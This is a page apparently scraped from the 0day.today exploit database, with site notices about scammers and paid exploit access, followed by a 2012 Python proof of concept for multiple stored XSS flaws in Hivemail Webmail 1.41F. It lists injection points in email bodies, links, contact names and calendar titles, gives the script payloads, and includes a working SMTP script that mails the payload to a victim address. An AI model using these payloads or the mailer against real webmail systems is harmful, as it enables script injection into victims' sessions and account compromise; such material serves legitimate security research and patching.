0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hivemail Webmail Multiple Stored XSS Vulnerabilities
#!/usr/bin/python ''' # Exploit Title: Hivemail Webmail Multiple Stored XSS issues # Date: 16/08/2012 # Exploit Author: Shai rod (@NightRang3r) # Vendor Homepage: http://www.hivemail.com/ # Software Link: http://www.hivemail.com/data/HM_1_41F_103.rar # Version: 1.41F Build 103 #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar Vulnerability Description ========================= 1. Stored XSS in email body. XSS Payload: <img src='1.jpg'onerror=javascript:alert("XSS")> Send an email to the victim with the payload in the message body. XSS Will be triggered when victim opens the message. 2. Stored XSS in e-mail body (HREF). XSS Payload: <a href=javascript:alert("AnotherXSS")>Click Me</a> Send an email to the victim with the payload in the email body, once the user clicks on the link the XSS should be triggered. 3. Stored XSS in contacts. XSS Payload: <img src='1.jpg'onerror=javascript:alert("XSS")> Create a new contact with the XSS payload in the contact name field, XSS will be triggered each time user view his contacts. 4. Stored XSS in calendar. XSS Payload: <img src='1.jpg'onerror=javascript:alert("XSS")> Create a new event and in the event title insert your XSS payload, XSS will be triggered when you view your calendar. ''' import smtplib print "###############################################" print "# Hivemail Webmail 1.41F StoredXSS #" print "# Coded by: Shai rod #" print "# @NightRang3r #" print "# http://exploit.co.il #" print "# For Educational Purposes Only! #" print "###############################################\r\n" # SETTINGS sender = "attacker@localhost" smtp_login = sender smtp_password = "qwe123" recipient = "victim@localhost" smtp_server = "localhost" smtp_port = 25 subject = "Hivemail Webmail XSS POC" xss_payload = """<img src='1.jpg'onerror=javascript:alert("XSS")>""" # SEND E-MAIL print "[*] Sending E-mail to " + recipient + "..." msg = ("From: " + xss_payload + "%s\r\nTo: %s\r\nSubject: %s\n" % (sender, ", ".join(recipient), subject) ) msg += "Content-type: text/html\n\n" msg += xss_payload msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n""" server = smtplib.SMTP(smtp_server, smtp_port) server.ehlo() server.starttls() server.login(smtp_login, smtp_password) server.sendmail(sender, recipient, msg) server.quit() print "[+] E-mail sent!" # 0day.today [2024-11-15] #